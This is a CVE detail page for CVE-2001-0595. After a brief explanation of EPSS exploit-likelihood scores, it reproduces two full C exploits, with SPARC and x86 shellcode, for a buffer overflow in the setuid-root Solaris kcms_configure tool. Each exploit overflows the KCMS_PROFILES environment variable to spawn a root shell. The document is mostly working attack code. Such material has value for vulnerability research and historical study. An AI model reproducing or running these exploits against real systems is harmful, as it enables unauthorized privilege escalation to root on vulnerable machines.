CVE-2001-0595 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* source: https://www.securityfocus.com/bid/2605/info The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker. The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. Exploits are available against Solaris x86 and Solaris Sparc. */ /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/ /*## kcsSUNWIOsolf.so #*/ #define NOPNUM 940 #define ADRNUM 32 #define PCHNUM 204 char setuidcode[]= "\x90\x08\x3f\xff" /* and %g0,-1,%o0 */ "\x82\x10\x20\x17" /* mov 0x17,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0xb,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; char jump[]= "\x81\xc3\xe0\x08" /* jmp %o7+8 */ "\x90\x10\x00\x0e" /* mov %sp,%o0 */ ; static char nop[]="\x80\x1c\x40\x11"; main(int argc,char **argv){ char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128]; int i; printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/\n"); printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n"); if(argc!=2){ printf("usage: %s xserver:display\n",argv[0]); exit(-1); } *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112; *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112; sprintf(display,"DISPLAY=%s",argv[1]); envp[0]=buffer; envp[1]=display; envp[2]=0; b=buffer; sprintf(b,"KCMS_PROFILES="); b+=14; for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; *b=0; execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp); }

/* source: https://www.securityfocus.com/bid/2605/info The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker. The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. Exploits are available against Solaris x86 and Solaris Sparc. */ /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/ /*## kcsSUNWIOsolf.so #*/ #define NOPNUM 16000 #define ADRNUM 2900 char setuidshellcode[]= "\x33\xc0" /* xorl %eax,%eax */ "\xeb\x08" /* jmp <setuidshellcode+12> */ "\x5f" /* popl %edi */ "\x47" /* incl %edi */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x47\x01" /* movb %al,0x1(%edi) */ "\xeb\x0d" /* jmp <setuidshellcode+25> */ "\xe8\xf3\xff\xff\xff" /* call <setuidshellcode+4> */ "\x9a\xff\xff\xff\xff" "\x07\xff" "\xc3" /* ret */ "\x33\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17,%al */ "\xe8\xee\xff\xff\xff" /* call <setuidshellcode+17> */ "\xeb\x16" /* jmp <setuidshellcode+59> */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x7(%edx) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xe8\xd6\xff\xff\xff" /* call <setuidshellcode+17> */ "\xe8\xe5\xff\xff\xff" /* call <setuidshellcode+37> */ "/bin/ksh" ; char jump[]= "\x8b\xc4" /* movl %esp,%eax */ "\xc3" /* ret */ ; main(int argc,char **argv){ char buffer[20000],*b,adr[4],*envp[4],display[128]; int i; printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/\n"); printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n"); if(argc!=2){ printf("usage: %s xserver:display\n",argv[0]); exit(-1); } *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000; sprintf(display,"DISPLAY=%s",argv[1]); envp[0]=&buffer[0]; envp[1]=&buffer[17000]; envp[2]=display; envp[3]=0; b=buffer; sprintf(b,"xxx="); b+=4; for(i=0;i<NOPNUM;i++) *b++=0x90; for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i]; *b=0; b=&buffer[17000]; sprintf(b,"KCMS_PROFILES="); b+=14; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; *b=0; execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp); }